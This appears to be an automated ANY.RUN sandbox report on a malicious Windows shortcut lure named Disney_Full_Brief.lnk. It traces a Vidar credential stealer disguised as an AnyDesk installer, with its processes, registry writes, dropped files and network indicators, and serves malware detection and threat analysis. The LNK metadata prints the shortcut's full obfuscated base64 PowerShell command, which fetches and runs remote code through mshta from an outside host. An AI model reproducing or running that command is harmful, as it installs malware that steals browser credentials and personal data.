File name: Disney_Full_Brief.lnk

Full analysis: https://app.any.run/tasks/b85933ee-1142-4726-9155-8c5823561fd4
Verdict: Malicious activity
Threats:

Stealers are a category of malware designed to gain unauthorized access to users' information and transfer it to the attacker. The category covers programs that each focus on a particular kind of data, including files, passwords, and cryptocurrency. Stealers can also spy on their targets by recording keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: July 12, 2025, 07:36:32
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-lnk
susp-powershell
anydesk
rmm-tool
telegram
stealer
vidar
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5: 2C45FB0C0262993D2669E91686DEF4D1
SHA1: 7647B3D4D82C5F41B17A26477A7BD18418C2112D
SHA256: 4D6BA4C3E0112FA8AD04153999086EECBE9BA33656A52C627A940650D086E877
SSDEEP: 48:8wTX1e3ztOTJzoDsZIGuiJ27zcdo9aQCaZ:8wJPTJwsZIdVJCA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is for the user's acknowledgement. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes powershell commands (LNK)

      • powershell.exe (PID: 2708)
    • Executing a file with an untrusted certificate

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • VIDAR has been detected (YARA)

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Steals credentials from Web Browsers

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Actions look like stealing of personal data

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 2708)
      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Starts POWERSHELL.EXE for command execution

      • powershell.exe (PID: 2708)
      • powershell.exe (PID: 4748)
      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 2708)
      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Application launched itself

      • powershell.exe (PID: 4748)
      • powershell.exe (PID: 2708)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • mshta.exe (PID: 2680)
    • Executed via WMI

      • powershell.exe (PID: 3624)
    • Creates an object to access WMI (SCRIPT)

      • mshta.exe (PID: 2680)
    • Executes script without checking the security policy

      • powershell.exe (PID: 3624)
    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 3624)
    • ANYDESK has been found

      • powershell.exe (PID: 3624)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3624)
      • csc.exe (PID: 856)
      • csc.exe (PID: 7372)
      • csc.exe (PID: 856)
      • csc.exe (PID: 8136)
      • csc.exe (PID: 4132)
    • There is functionality for taking screenshot (YARA)

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Reads security settings of Internet Explorer

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • The process hides an interactive prompt from the user

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 856)
      • csc.exe (PID: 7372)
      • csc.exe (PID: 856)
      • csc.exe (PID: 4132)
      • csc.exe (PID: 8136)
    • The process bypasses the loading of PowerShell profile settings

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2272)
      • powershell.exe (PID: 7828)
      • powershell.exe (PID: 7452)
      • powershell.exe (PID: 7596)
      • powershell.exe (PID: 2220)
    • Searches for installed software

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 2680)
      • powershell.exe (PID: 3624)
      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • slui.exe (PID: 3480)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4748)
      • powershell.exe (PID: 3624)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 2680)
    • Found Base64 encoded access to Regex class via PowerShell (YARA)

      • powershell.exe (PID: 3624)
    • Checks supported languages

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • csc.exe (PID: 856)
      • cvtres.exe (PID: 1028)
      • csc.exe (PID: 7372)
      • cvtres.exe (PID: 6200)
      • csc.exe (PID: 856)
      • cvtres.exe (PID: 7436)
      • csc.exe (PID: 4132)
      • cvtres.exe (PID: 7344)
      • csc.exe (PID: 8136)
      • cvtres.exe (PID: 5876)
    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 2664)
      • powershell.exe (PID: 2272)
      • powershell.exe (PID: 7828)
      • powershell.exe (PID: 7452)
      • powershell.exe (PID: 7596)
      • powershell.exe (PID: 2220)
      • powershell.exe (PID: 3160)
    • Application launched itself

      • AcroCEF.exe (PID: 6380)
      • Acrobat.exe (PID: 6256)
      • chrome.exe (PID: 4120)
      • chrome.exe (PID: 7784)
      • chrome.exe (PID: 7400)
      • chrome.exe (PID: 8144)
      • chrome.exe (PID: 7928)
      • chrome.exe (PID: 7468)
    • The sample is compiled with English language support

      • powershell.exe (PID: 3624)
    • Creates files in the program directory

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Reads the machine GUID from the registry

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • csc.exe (PID: 856)
      • csc.exe (PID: 7372)
      • csc.exe (PID: 856)
      • csc.exe (PID: 4132)
      • csc.exe (PID: 8136)
    • Creates files or folders in the user directory

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Reads the software policy settings

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • powershell.exe (PID: 2272)
      • powershell.exe (PID: 7828)
      • powershell.exe (PID: 7452)
      • powershell.exe (PID: 7596)
      • powershell.exe (PID: 2220)
      • powershell.exe (PID: 3160)
      • slui.exe (PID: 3480)
    • Reads the computer name

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 2664)
    • Reads Environment values

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Reads CPU info

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
    • Disables trace logs

      • powershell.exe (PID: 3624)
    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 6860)
    • Creates files in a temporary directory

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • powershell.exe (PID: 2272)
      • powershell.exe (PID: 7828)
      • cvtres.exe (PID: 1028)
      • csc.exe (PID: 856)
      • csc.exe (PID: 7372)
      • cvtres.exe (PID: 6200)
      • powershell.exe (PID: 7452)
      • csc.exe (PID: 856)
      • cvtres.exe (PID: 7436)
      • powershell.exe (PID: 7596)
      • csc.exe (PID: 4132)
      • cvtres.exe (PID: 7344)
      • csc.exe (PID: 8136)
      • powershell.exe (PID: 3160)
      • powershell.exe (PID: 2220)
      • cvtres.exe (PID: 5876)
    • Reads product name

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
RelativePath: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: powershell -E cwBjAGIAIAAnAG0AKAAoAHMAKAAoAGgAKAB0AGEAKAAoACAAaAB0AHQAKAAoAHAAKAAoACgAKABzADoALwAvACgAKAB3ACgAKAAoAHcAKAAoACgAdwAuACgAKAAoAGwAbwBjAGEAbABtAGEAKAAoAGkAcwAuACgAKAAoACgAYwBvACgAKABtACgALgAoACgAYgAoACgAcgAvACgARAAoACgAaQAoACgAKAAoAHMAbgBlAHkAXwBGAHUAKAAoACgAbABsAF8AKAAoAEIAcgBpACgAKAAoAGUAZgAoACgAKAAuACgAKAAoAG0AKABwADQAKAAoACgAKAAoACgAJwAuAHIAZQBwAGwAYQBjAGUAKAAnACgAJwAsACcAJwApADsAZwBjAGIAIAB8ACAAcABvAHcAZQByAHMAaABlAGwAbAA=
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
Total processes: 243
Monitored processes: 105
Malicious processes: 2
Suspicious processes: 8


Process information

PID 856
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\mkjssl2n.cmdline"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 0
Version: 4.8.9037.0 built by: NET481REL1
Modules (images):
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll

PID 856
CMD: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\per3xzpx.cmdline"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 0
Version: 4.8.9037.0 built by: NET481REL1
Modules (images):
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll

PID 1028
CMD: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES1642.tmp" "c:\Users\admin\AppData\Local\Temp\CSCD1AB09BCAE9442639997973DE696128F.TMP"
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Parent process: csc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft® Resource File To COFF Object Conversion Utility
Exit code: 0
Version: 14.32.31326.0
Modules (images):
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll

PID 1296
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=1820,i,3157915898331620336,9337952579319487536,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=3884 /prefetch:2
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: LOW
Description: Google Chrome
Exit code: 0
Version: 133.0.6943.127
Modules (images):
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll

PID 1300
CMD: "C:\Users\admin\AppData\Roaming\DarkCyan-fa1d3_Install.exe"
Path: C:\Users\admin\AppData\Roaming\DarkCyan-fa1d3_Install.exe
Parent process: powershell.exe
User: admin
Company: AnyDesk Software GmbH
Integrity Level: MEDIUM
Description: AnyDesk
Version: 9.5.7
Modules (images):
c:\users\admin\appdata\roaming\darkcyan-fa1d3_install.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll

PID 1388
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID 1936
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1524 --field-trial-handle=1620,i,8729716041870340005,7771732445424601459,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User: admin
Company: Adobe Systems Incorporated
Integrity Level: LOW
Description: Adobe AcroCEF
Exit code: 0
Version: 23.1.20093.0
Modules (images):
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll

PID 2032
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,2829932549536830831,9167062889677403213,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4600 /prefetch:1
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: LOW
Description: Google Chrome
Exit code: 0
Version: 133.0.6943.127
Modules (images):
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll

PID 2040
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=2132,i,6030629021490684742,7880899286757095648,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=2164 /prefetch:3
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: MEDIUM
Description: Google Chrome
Exit code: 0
Version: 133.0.6943.127
Modules (images):
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll

PID 2040
CMD: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,12324914474511994789,6000475780446616241,262144 --variations-seed-version --mojo-platform-channel-handle=3240 /prefetch:1
Path: C:\Program Files\Google\Chrome\Application\chrome.exe
Parent process: chrome.exe
User: admin
Company: Google LLC
Integrity Level: LOW
Description: Google Chrome
Exit code: 0
Version: 133.0.6943.127
Modules (images):
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
Total events: 90 746
Read events: 90 602
Write events: 142
Delete events: 2

Modification events

(2680) mshta.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
  Operation: write
  Name: CachePrefix
  Value:

(2680) mshta.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
  Operation: write
  Name: CachePrefix
  Value: Cookie:

(2680) mshta.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
  Operation: write
  Name: CachePrefix
  Value: Visited:

(3624) powershell.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
  Operation: write
  Name: Acrobat.Document.DC
  Value:

(2664) OpenWith.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
  Operation: write
  Name: Acrobat.Document.DC
  Value:

(6256) Acrobat.exe
  Key: HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
  Operation: write
  Name: DisplayName
  Value: Adobe Acrobat Reader Protected Mode

(2804) Acrobat.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
  Operation: write
  Name: bLastExitNormal
  Value: 0

(2804) Acrobat.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
  Operation: write
  Name: bSynchronizeOPL
  Value: 0

(2804) Acrobat.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
  Operation: write
  Name: uLastAppLaunchTimeStamp
  Value:

(2804) Acrobat.exe
  Key: HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
  Operation: write
  Name: iNumAcrobatLaunches
  Value: 7
Executable files: 6
Suspicious files: 275
Text files: 207
Unknown types: 0

Dropped files

PID | Process | Filename | Type
3624 | powershell.exe | C:\Users\admin\AppData\Roaming\Brief_Disney.pdf | -
  MD5: -
  SHA256: -
2708 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VE1O5DBKGA0WNB35729B.temp | binary
  MD5: C6EBC891866DB8AB4A705E194086BFFC
  SHA256: E8D1653EC8C0A5416D38C54A04F0541841D40D2B23964922EC2BFE868DDF66A1
4748 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rz3fdumw.pmr.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2708 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h0muxj1y.nhu.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4748 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ka3cqsin.hgh.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6860 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jxq0xrox.y0t.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6860 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | binary
  MD5: 0E111B039165A9C2620122322DBDD5F6
  SHA256: 1DD25D870AF149620332B3A39AFC0BEB7AA432C249B275DA00CE9977E8A67747
6860 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pxhzgjxc.mep.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3624 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2oeu0qop.b51.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3624 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ddta4vzv.evd.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 15
TCP/UDP connections: 131
DNS requests: 131
Threats: 1

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
1268 | svchost.exe | GET | 200 | 23.216.77.25:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
1300 | DarkCyan-fa1d3_Install.exe | GET | 200 | 104.18.21.213:80 | http://e6.c.lencr.org/89.crl | unknown | whitelisted
7020 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
3048 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
3048 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
7572 | chrome.exe | GET | 200 | 142.250.184.238:80 | http://clients2.google.com/time/1/current?cup2key=8:fmZOi_5-9cQH8i3Ye5r5kVFO9VX91kvqQ8ss-pe_nts&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | unknown | whitelisted
6256 | Acrobat.exe | GET | 200 | 184.30.131.245:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAfy81yHqHeveu%2FpR5k1Jb0%3D | unknown | whitelisted
1268 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
2940 | svchost.exe | GET | 200 | 104.76.201.34:80 | http://x1.c.lencr.org/ | unknown | whitelisted
7612 | chrome.exe | GET | 200 | 142.250.184.238:80 | http://clients2.google.com/time/1/current?cup2key=8:39w0KfSguIW3YdjfPioOyO6wkdCHPjSRXcNbBNT7zCM&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
1268 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | whitelisted
5944 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3936 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | whitelisted
2680 | mshta.exe | 191.252.139.125:443 | www.localmais.com.br | Locaweb Servicos de Internet SA | BR | unknown
1268 | svchost.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
1268 | svchost.exe | 23.216.77.25:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
1268 | svchost.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
2680 | mshta.exe | 104.18.21.213:80 | r11.c.lencr.org | CLOUDFLARENET | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 40.127.240.158, 51.124.78.146, 51.104.136.2 | whitelisted
google.com | 142.250.186.174 | whitelisted
www.localmais.com.br | 191.252.139.125 | unknown
crl.microsoft.com | 23.216.77.25, 23.216.77.21 | whitelisted
www.microsoft.com | 23.35.229.160 | whitelisted
r11.c.lencr.org | 104.18.21.213, 104.18.20.213 | whitelisted
login.live.com | 20.190.159.71, 40.126.31.129, 40.126.31.1, 20.190.159.129, 40.126.31.69, 20.190.159.75, 40.126.31.3, 40.126.31.130 | whitelisted
ocsp.digicert.com | 2.17.190.73, 184.30.131.245 | whitelisted
squeakiekids.com | 69.64.83.216 | unknown
nexusrules.officeapps.live.com | 52.111.229.48 | whitelisted

Threats

PID | Process | Class | Message
1300 | DarkCyan-fa1d3_Install.exe | Misc activity | ET INFO Observed Telegram Domain (t .me in TLS SNI)
No debug info